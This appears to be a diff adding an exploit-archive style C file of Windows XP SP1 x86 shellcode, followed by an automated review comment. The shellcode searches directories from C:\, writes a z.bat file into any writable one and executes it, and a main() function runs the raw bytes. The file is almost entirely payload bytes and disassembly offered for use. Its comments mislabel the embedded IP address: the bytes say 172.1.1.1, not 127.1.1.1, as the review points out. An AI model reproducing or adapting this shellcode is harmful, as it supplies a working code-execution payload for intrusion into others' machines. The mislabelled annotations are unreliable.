@@ -0,0 +1,90 @@ +# Title: Windows x86 - Executable directory search Shellcode (130 bytes) +# Date: 26-02-2017 +# Author: Krzysztof Przybylski +# Platform: Win_x86 +# Tested on: WinXP SP1 +# Shellcode Size: 130 bytes + +/* +Description: +write & exec dir searcher +starts from C:\ +If dir found then write, execute (ping 127.1.1.1) and exit +If Write/noexec dir found then continue + +Tested on WinXP SP1 (77e6fd35;77e798fd) +i686-w64-mingw32-gcc shell.c -o golddgger.exe + +Null-free version: + +(gdb) disassemble +Dump of assembler code for function function: +=> 0x08048062 <+0>: pop ecx + 0x08048063 <+1>: xor eax,eax + 0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al + 0x08048068 <+6>: push eax + 0x08048069 <+7>: push ecx + 0x0804806a <+8>: mov eax,0x77e6fd35 + 0x0804806f <+13>: call eax + 0x08048071 <+15>: xor eax,eax + 0x08048073 <+17>: push eax + 0x08048074 <+18>: mov eax,0x77e798fd + 0x08048079 <+23>: call eax + + +NULL-free shellcode (132 bytes): + +"\xeb\x19\x59\x31\xc0\x88\x41\x64" +"\x50\x51\xb8" +"\x35\xfd\xe6\x77" // exec +"\xff\xd0\x31\xc0\x50\xb8" +"\xfd\x98\xe7\x77" // exit +"\xff\xd0\xe8\xe2\xff\xff\xff" +"\x63\x6d\x64\x2e\x65\x78\x65\x20" +"\x2f\x43\x20\x22\x28\x63\x64\x20" +"\x63\x3a\x5c" // C:\ +"\x20\x26\x46\x4f\x52" +"\x20\x2f\x44\x20\x2f\x72\x20\x25" +"\x41\x20\x49\x4e\x20\x28\x2a\x29" +"\x20\x44\x4f\x20" +"\x65\x63\x68\x6f\x20" +"\x70\x69\x6e\x67\x20" +"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 +"\x3e\x22\x25\x41\x5c\x7a\x2e\x62" +"\x61\x74\x22\x26\x28\x63\x61\x6c" +"\x6c\x20\x22\x25\x41\x5c\x7a\x2e" +"\x62\x61\x74\x22\x26\x26\x65\x78" +"\x69\x74\x29\x29\x22"; + +*/ +// NULL version (130 bytes): + +char code[] = +"\xeb\x16\x59\x31\xc0\x50\x51\xb8" +"\x35\xfd\xe6\x77" // exec +"\xff\xd0\x31\xc0\x50\xb8" +"\xfd\x98\xe7\x77" // exit +"\xff\xd0\xe8\xe5\xff\xff\xff\x63" +"\x6d\x64\x2e\x65\x78\x65\x20\x2f" +"\x43\x20\x22\x28\x63\x64\x20" +"\x63\x3a\x5c" // C:\ +"\x20\x26\x46\x4f\x52\x20\x2f\x44" +"\x20\x2f\x72\x20\x25\x41\x20\x49" 
+"\x4e\x20\x28\x2a\x29\x20\x44\x4f" +"\x20\x65\x63\x68\x6f\x20\x70\x69" +"\x6e\x67\x20" +"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 +"\x3e\x22\x25\x41" +"\x5c\x7a\x2e\x62\x61\x74\x22\x26" +"\x28\x63\x61\x6c\x6c\x20\x22\x25" +"\x41\x5c\x7a\x2e\x62\x61\x74\x22" +"\x26\x26\x65\x78\x69\x74\x29\x29" +"\x22\x00"; + +int main(int argc, char **argv) + +{ + int (*func)(); + func = (int (*)()) code; + (int)(*func)(); +}
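Review bot: the file opens with six `# Title:` / `# Date:` / `# Author:` … lines outside any comment, and a C compiler treats a line starting with `#` as a preprocessing directive, so the build command quoted in the description (`i686-w64-mingw32-gcc shell.c -o golddgger.exe`) fails with "invalid preprocessing directive" until those lines are moved inside the `/* ... */` block or prefixed with `//`. The inline comment `// 127.1.1.1` on the bytes `"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"` does not match what the bytes encode: 0x31 0x37 0x32 is '1' '7' '2', so the embedded command text reads `172.1.1.1`, not the `127.1.1.1` the description and the NULL-free listing both claim — either the comment or the bytes are wrong, and the discrepancy should be resolved rather than left for a reader to trust the comment. The `// exec` and `// exit` comments on `\x35\xfd\xe6\x77` and `\xfd\x98\xe7\x77` name the purpose but not that these are absolute addresses valid only for the WinXP SP1 build listed in the header; `// exec (0x77e6fd35, WinXP SP1 only)` would keep that caveat next to the bytes. In `main`, `(int)(*func)();` casts a return value to int only to discard it, and `argc`/`argv` are unused; `func();` and `int main(void)` are the conventional forms.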